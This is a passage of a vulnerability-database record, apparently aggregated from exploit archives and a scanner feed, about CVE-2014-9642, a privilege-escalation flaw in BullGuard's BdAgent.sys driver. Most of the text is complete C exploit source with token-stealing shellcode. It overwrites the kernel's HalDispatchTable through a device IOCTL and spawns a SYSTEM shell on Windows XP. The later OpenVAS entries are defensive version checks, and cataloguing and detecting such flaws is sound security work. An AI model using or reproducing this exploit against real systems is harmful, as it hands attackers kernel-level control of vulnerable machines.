GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); \n \nif (hDevice == INVALID_HANDLE_VALUE) \n{ \nprintf(\"[-] CreateFile open %s device failed (%d)\\n\\n\", devhandle, GetLastError()); \nreturn -1; \n} \nelse \n{ \nprintf(\"[+] Open %s device successful\\n\", devhandle); \n} \n \nHalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); \nprintf(\"[+] HalDispatchTable+4 (0x%08x) will be overwritten\\n\", HalDispatchTableTarget); \n \ninput[0] = addrtoshell; // input buffer contents gets written to our output buffer address \n \nprintf(\"[+] Input buffer contents %08x\\n\", input[0]); \n \nprintf(\"[~] Press any key to send Exploit . . .\\n\"); \ngetch(); \n \nDeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); \n \nprintf(\"[+] Buffer sent\\n\"); \n \nprintf(\"[+] Spawning SYSTEM Shell\\n\"); \nNtQueryIntervalProfile(2, &time); \nspawnShell(); \n \nprintf(\"[+] Restoring Hal dispatch table pointers\\n\\n\"); \n \nDeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); \n \nCloseHandle(hDevice); \n \nreturn 0; \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/130247/bullguard-escalate.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T02:27:38", "bulletinFamily": "exploit", "description": "BullGuard Multiple Products - Arbitrary Write Privilege Escalation. CVE-2014-9642. 
Local exploit for windows platform", "modified": "2015-02-04T00:00:00", "published": "2015-02-04T00:00:00", "id": "EDB-ID:35994", "href": "https://www.exploit-db.com/exploits/35994/", "type": "exploitdb", "title": "BullGuard Multiple Products - Arbitrary Write Privilege Escalation", "sourceData": "/*\r\n\r\nExploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation\r\nDate - 04th February 2015\r\nDiscovered by - Parvez Anwar (@parvezghh)\r\nVendor Homepage - http://www.bullguard.com/\r\nTested Version - 14.1.285.4\r\nDriver Version - 1.0.0.6 - BdAgent.sys\r\nTested on OS - 32bit Windows XP SP3 \r\nOSVDB - http://www.osvdb.org/show/osvdb/114478\r\nCVE ID - CVE-2014-9642\r\nVendor fix url - http://www.bullguard.com/about/release-notes.aspx\r\nFixed Version - 15.0.288.1\r\nFixed driver ver - 1.0.0.7\r\n\r\n\r\n\r\nNote\r\n----\r\nOverwritten HAL dispatch table after exploit \r\n\r\nkd> dps nt!HalDispatchTable l c\r\n8054ccb8 00000003\r\n8054ccbc 00340000\r\n8054ccc0 00010000\r\n8054ccc4 0a060002\r\n8054ccc8 ee657645\r\n8054cccc 00000001\r\n8054ccd0 00000001\r\n8054ccd4 867c1bf0\r\n8054ccd8 80613f7b nt!IoSetPartitionInformation\r\n8054ccdc 806141ef nt!IoWritePartitionTable\r\n8054cce0 8052d157 nt!CcHasInactiveViews\r\n8054cce4 804e42d1 nt!ObpTraceDepth+0x19\r\n\r\n7 pointers get overwritten. 
Since input buffer is in our control and pointers\r\nare static in XP I've triggered the overwrite again restoring the pointers.\r\n\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <windows.h>\r\n\r\n#define BUFSIZE 4096\r\n\r\n\r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n \r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS { \r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(\r\n SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n PVOID SystemInformation,\r\n ULONG SystemInformationLength,\r\n PULONG ReturnLength);\r\n\r\ntypedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(\r\n DWORD ProfileSource, \r\n PULONG Interval);\r\n\r\ntypedef void (*FUNCTPTR)(); \r\n\r\n\r\n\r\n// Windows XP SP3\r\n\r\n#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct\r\n#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct\r\n#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct\r\n#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct\r\n\r\n\r\nBYTE token_steal_xp[] =\r\n{\r\n 0x52, // push edx Save edx on the stack\r\n 0x53,\t // push ebx Save ebx on the stack\r\n 0x33,0xc0, // xor eax, eax eax = 0\r\n 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD\r\n 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS\r\n 0x8b,0xc8, // mov ecx, eax\r\n 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves 
TOKEN\r\n 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks\r\n 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks\r\n 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)\r\n 0x75,0xe8, // jne ---- \r\n 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX\r\n 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX\r\n 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS\r\n 0x5b, // pop ebx Restores ebx\r\n 0x5a, // pop edx Restores edx\r\n 0xc2,0x08 // ret 8 Away from the kernel \r\n};\r\n\r\n\r\n\r\nBYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable\r\n\"\\xf2\\xa3\\x6f\\x80\" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation\r\n\"\\xce\\xa3\\x6f\\x80\" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation\r\n\"\\x0b\\x46\\x61\\x80\" // 8054ccc4 8061460b nt!xHalQueryBusSlots\r\n\"\\x00\\x00\\x00\\x00\" // 8054ccc8 00000000\r\n\"\\x4d\\xac\\x50\\x80\" // 8054cccc 8050ac4d nt!HalExamineMBR\r\n\"\\x89\\x6f\\x5c\\x80\" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters\r\n\"\\xe5\\x4a\\x5c\\x80\"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable\r\n\r\n\r\n\r\nDWORD HalDispatchTableAddress() \r\n{\r\n _NtQuerySystemInformation NtQuerySystemInformation;\r\n PSYSTEM_MODULE_INFORMATION pModuleInfo;\r\n DWORD HalDispatchTable;\r\n CHAR kFullName[256];\r\n PVOID kBase = NULL;\r\n LPSTR kName;\r\n HMODULE Kernel;\r\n FUNCTPTR Hal;\r\n ULONG len;\r\n NTSTATUS status;\r\n\r\n\r\n NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQuerySystemInformation\");\r\n \t\r\n if (!NtQuerySystemInformation)\r\n {\r\n printf(\"[-] Unable to resolve NtQuerySystemInformation\\n\\n\");\r\n return -1; \r\n }\r\n\r\n status = 
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);\r\n\r\n if (!status) \r\n {\r\n printf(\"[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\\n\\n\", status);\r\n return -1;\r\n }\r\n\t\t\r\n pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);\r\n\r\n if(pModuleInfo == NULL)\r\n {\r\n printf(\"[-] An error occurred with GlobalAlloc for pModuleInfo\\n\\n\");\r\n return -1;\r\n }\r\n\r\n status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);\r\n\t\r\n memset(kFullName, 0x00, sizeof(kFullName));\r\n strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);\r\n kBase = pModuleInfo->Module[0].Base;\r\n\r\n printf(\"[i] Kernel base name %s\\n\", kFullName);\r\n kName = strrchr(kFullName, '\\\\');\r\n\r\n Kernel = LoadLibraryA(++kName);\r\n\r\n if(Kernel == NULL) \r\n {\r\n printf(\"[-] Failed to load kernel base\\n\\n\");\r\n return -1;\r\n }\r\n\r\n Hal = (FUNCTPTR)GetProcAddress(Kernel, \"HalDispatchTable\");\r\n\r\n if(Hal == NULL)\r\n {\r\n printf(\"[-] Failed to find HalDispatchTable\\n\\n\");\r\n return -1;\r\n }\r\n \r\n printf(\"[i] HalDispatchTable address 0x%08x\\n\", Hal);\t\r\n printf(\"[i] Kernel handle 0x%08x\\n\", Kernel);\r\n printf(\"[i] Kernel base address 0x%08x\\n\", kBase); \r\n\r\n HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);\r\n\r\n printf(\"[+] Kernel address of HalDispatchTable 0x%08x\\n\", HalDispatchTable);\r\n\r\n if(!HalDispatchTable)\r\n {\r\n printf(\"[-] Failed to calculate HalDispatchTable\\n\\n\");\r\n\treturn -1;\r\n }\r\n\r\n return HalDispatchTable;\r\n}\r\n\r\n\r\nint GetWindowsVersion()\r\n{\r\n int v = 0;\r\n DWORD version = 0, minVersion = 0, majVersion = 0;\r\n\r\n version = GetVersion();\r\n\r\n minVersion = (DWORD)(HIBYTE(LOWORD(version)));\r\n majVersion = (DWORD)(LOBYTE(LOWORD(version)));\r\n\r\n if (minVersion == 1 && majVersion == 5) v = 1; // \"Windows XP;\r\n if (minVersion == 1 && majVersion 
== 6) v = 2; // \"Windows 7\";\r\n if (minVersion == 2 && majVersion == 5) v = 3; // \"Windows Server 2003;\r\n\r\n return v;\r\n}\r\n\r\n\r\nvoid spawnShell()\r\n{\r\n STARTUPINFOA si;\r\n PROCESS_INFORMATION pi;\r\n\r\n\r\n ZeroMemory(&pi, sizeof(pi));\r\n ZeroMemory(&si, sizeof(si));\r\n si.cb = sizeof(si);\r\n\r\n si.cb = sizeof(si); \r\n si.dwFlags = STARTF_USESHOWWINDOW;\r\n si.wShowWindow = SW_SHOWNORMAL;\r\n\r\n if (!CreateProcess(NULL, \"cmd.exe\", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))\r\n {\r\n printf(\"\\n[-] CreateProcess failed (%d)\\n\\n\", GetLastError());\r\n return;\r\n }\r\n\r\n CloseHandle(pi.hThread);\r\n CloseHandle(pi.hProcess);\r\n}\r\n\r\n\r\nint main(int argc, char *argv[]) \r\n{\r\n\r\n _NtQueryIntervalProfile NtQueryIntervalProfile;\r\n LPVOID input[1] = {0}; \r\n LPVOID addrtoshell;\r\n HANDLE hDevice;\r\n DWORD dwRetBytes = 0;\r\n DWORD HalDispatchTableTarget; \r\n ULONG time = 0;\r\n unsigned char devhandle[MAX_PATH]; \r\n\r\n\r\n printf(\"-------------------------------------------------------------------------------\\n\");\r\n printf(\" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \\n\");\r\n printf(\" Tested on Windows XP SP3 (32bit) \\n\");\r\n printf(\"-------------------------------------------------------------------------------\\n\\n\");\r\n\r\n if (GetWindowsVersion() == 1) \r\n {\r\n printf(\"[i] Running Windows XP\\n\");\r\n }\r\n\r\n if (GetWindowsVersion() == 0) \r\n {\r\n printf(\"[i] Exploit not supported on this OS\\n\\n\");\r\n return -1;\r\n } \r\n\r\n sprintf(devhandle, \"\\\\\\\\.\\\\%s\", \"bdagent\");\r\n\r\n NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQueryIntervalProfile\");\r\n \t\r\n if (!NtQueryIntervalProfile)\r\n {\r\n printf(\"[-] Unable to resolve NtQueryIntervalProfile\\n\\n\");\r\n return -1; \r\n }\r\n \r\n addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, 
PAGE_EXECUTE_READWRITE);\r\n\r\n if(addrtoshell == NULL)\r\n {\r\n printf(\"[-] VirtualAlloc allocation failure %.8x\\n\\n\", GetLastError());\r\n return -1;\r\n }\r\n printf(\"[+] VirtualAlloc allocated memory at 0x%.8x\\n\", addrtoshell);\r\n\r\n memset(addrtoshell, 0x90, BUFSIZE);\r\n memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));\r\n printf(\"[i] Size of shellcode %d bytes\\n\", sizeof(token_steal_xp));\r\n\r\n hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);\r\n \r\n if (hDevice == INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"[-] CreateFile open %s device failed (%d)\\n\\n\", devhandle, GetLastError());\r\n return -1;\r\n }\r\n else \r\n {\r\n printf(\"[+] Open %s device successful\\n\", devhandle);\r\n }\r\n\r\n HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);\r\n printf(\"[+] HalDispatchTable+4 (0x%08x) will be overwritten\\n\", HalDispatchTableTarget);\r\n\r\n input[0] = addrtoshell; // input buffer contents gets written to our output buffer address\r\n \r\n printf(\"[+] Input buffer contents %08x\\n\", input[0]);\r\n \t\r\n printf(\"[~] Press any key to send Exploit . . 
.\\n\");\r\n getch();\r\n\r\n DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);\r\n\r\n printf(\"[+] Buffer sent\\n\");\r\n\r\n printf(\"[+] Spawning SYSTEM Shell\\n\");\r\n NtQueryIntervalProfile(2, &time);\r\n spawnShell();\r\n\r\n printf(\"[+] Restoring Hal dispatch table pointers\\n\\n\");\r\n\r\n DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);\r\n\r\n CloseHandle(hDevice);\r\n\r\n return 0;\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35994/"}], "openvas": [{"lastseen": "2019-05-29T18:36:51", "bulletinFamily": "scanner", "description": "This host is installed with BullGuard\n Premium Protection and is prone to local privilege escalation vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2015-02-13T00:00:00", "id": "OPENVAS:1361412562310805277", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805277", "title": "BullGuard Premium Protection 'BdAgent.sys' Driver Privilege Escalation Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bullguard_pp_priv_escal_vuln_feb15.nasl 11975 2018-10-19 06:54:12Z cfischer $\n#\n# BullGuard Premium Protection 'BdAgent.sys' Driver Privilege Escalation Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without 
even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bullguard:premium_protection\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805277\");\n script_version(\"$Revision: 11975 $\");\n script_cve_id(\"CVE-2014-9642\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:54:12 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-13 12:27:54 +0530 (Fri, 13 Feb 2015)\");\n script_name(\"BullGuard Premium Protection 'BdAgent.sys' Driver Privilege Escalation Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with BullGuard\n Premium Protection and is prone to local privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in the\n BdAgent.sys driver that is triggered when handling various IOCTLs\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local\n attacker to write data to an arbitrary memory location, leading to code\n execution with kernel-level privileges.\");\n\n script_tag(name:\"affected\", value:\"BullGuard Premium Protection before\n version 15.0.288\");\n\n script_tag(name:\"solution\", value:\"Upgrade to BullGuard Premium Protection\n version 15.0.288 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", 
value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://www.greyhathacker.net/?p=818\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/35994\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/130247\");\n script_xref(name:\"URL\", value:\"http://www.bullguard.com/about/release-notes.aspx\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_bullguard_premium_protection_detect.nasl\");\n script_mandatory_keys(\"BullGuard/Premium/Protection/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!bullVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:bullVer, test_version:\"15.0.288.0\"))\n{\n report = 'Installed version: ' + bullVer + '\\n' +\n 'Fixed version: ' + '15.0.288.0' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:09", "bulletinFamily": "scanner", "description": "This host is installed with BullGuard\n Backup and is prone to local privilege escalation vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2015-02-12T00:00:00", "id": "OPENVAS:1361412562310805278", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805278", "title": "BullGuard Backup 'BdAgent.sys' Driver Local Privilege Escalation Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bullguard_backup_priv_escal_vuln_feb15.nasl 11975 2018-10-19 06:54:12Z cfischer $\n#\n# BullGuard Backup 'BdAgent.sys' Driver Local Privilege Escalation Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free 
software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bullguard:online_backup\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805278\");\n script_version(\"$Revision: 11975 $\");\n script_cve_id(\"CVE-2014-9642\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:54:12 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-12 17:10:23 +0530 (Thu, 12 Feb 2015)\");\n script_name(\"BullGuard Backup 'BdAgent.sys' Driver Local Privilege Escalation Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with BullGuard\n Backup and is prone to local privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in the\n BdAgent.sys driver that is triggered when handling various IOCTLs\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local\n attacker to write data to an arbitrary memory location, leading to code\n execution with kernel-level privileges.\");\n\n script_tag(name:\"affected\", 
value:\"BullGuard Backup before version 15.0.288\");\n\n script_tag(name:\"solution\", value:\"Upgrade to BullGuard Backup version\n 15.0.288 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://www.greyhathacker.net/?p=818\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/35994\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/130247\");\n script_xref(name:\"URL\", value:\"http://www.bullguard.com/about/release-notes.aspx\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_bullguard_backup_detect.nasl\");\n script_mandatory_keys(\"BullGuard/Backup/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!bullVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:bullVer, test_version:\"15.0.288.0\"))\n{\n report = 'Installed version: ' + bullVer + '\\n' +\n 'Fixed version: ' + '15.0.288.0' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:33", "bulletinFamily": "scanner", "description": "This host is installed with BullGuard\n AntiVirus and is prone to local privilege escalation vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2015-02-12T00:00:00", "id": "OPENVAS:1361412562310805275", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805275", "title": "BullGuard AntiVirus 'BdAgent.sys' Driver Local Privilege Escalation Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bullguard_av_priv_escal_vuln_feb15.nasl 11975 2018-10-19 06:54:12Z cfischer $\n#\n# BullGuard AntiVirus 
'BdAgent.sys' Driver Local Privilege Escalation Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bullguard:antivirus\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805275\");\n script_version(\"$Revision: 11975 $\");\n script_cve_id(\"CVE-2014-9642\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:54:12 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-12 17:10:23 +0530 (Thu, 12 Feb 2015)\");\n script_name(\"BullGuard AntiVirus 'BdAgent.sys' Driver Local Privilege Escalation Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with BullGuard\n AntiVirus and is prone to local privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in the\n BdAgent.sys driver that is triggered when handling various IOCTLs\");\n\n 
script_tag(name:\"impact\", value:\"Successful exploitation will allow local\n attacker to write data to an arbitrary memory location, leading to code\n execution with kernel-level privileges.\");\n\n script_tag(name:\"affected\", value:\"BullGuard AntiVirus before version 15.0.288\");\n\n script_tag(name:\"solution\", value:\"Upgrade to BullGuard AntiVirus version\n 15.0.288 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://www.greyhathacker.net/?p=818\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/35994\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/130247\");\n script_xref(name:\"URL\", value:\"http://www.bullguard.com/about/release-notes.aspx\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_bullguard_antivirus_detect.nasl\");\n script_mandatory_keys(\"BullGuard/AntiVirus/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!bullVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:bullVer, test_version:\"15.0.288.0\"))\n{\n report = 'Installed version: ' + bullVer + '\\n' +\n 'Fixed version: ' + '15.0.288.0' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:40", "bulletinFamily": "scanner", "description": "This host is installed with BullGuard\n Internet Security and is prone to local privilege escalation vulnerability.", "modified": "2018-10-19T00:00:00", "published": "2015-02-12T00:00:00", "id": "OPENVAS:1361412562310805276", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805276", "title": "BullGuard Internet Security 'BdAgent.sys' Driver Privilege Escalation Vulnerability", 
"type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bullguard_is_priv_escal_vuln_feb15.nasl 11975 2018-10-19 06:54:12Z cfischer $\n#\n# BullGuard Internet Security 'BdAgent.sys' Driver Privilege Escalation Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bullguard:internet_security\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805276\");\n script_version(\"$Revision: 11975 $\");\n script_cve_id(\"CVE-2014-9642\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-19 08:54:12 +0200 (Fri, 19 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-12 19:10:23 +0530 (Thu, 12 Feb 2015)\");\n script_name(\"BullGuard Internet Security 'BdAgent.sys' Driver Privilege Escalation Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with BullGuard\n Internet Security and is prone to local privilege escalation 
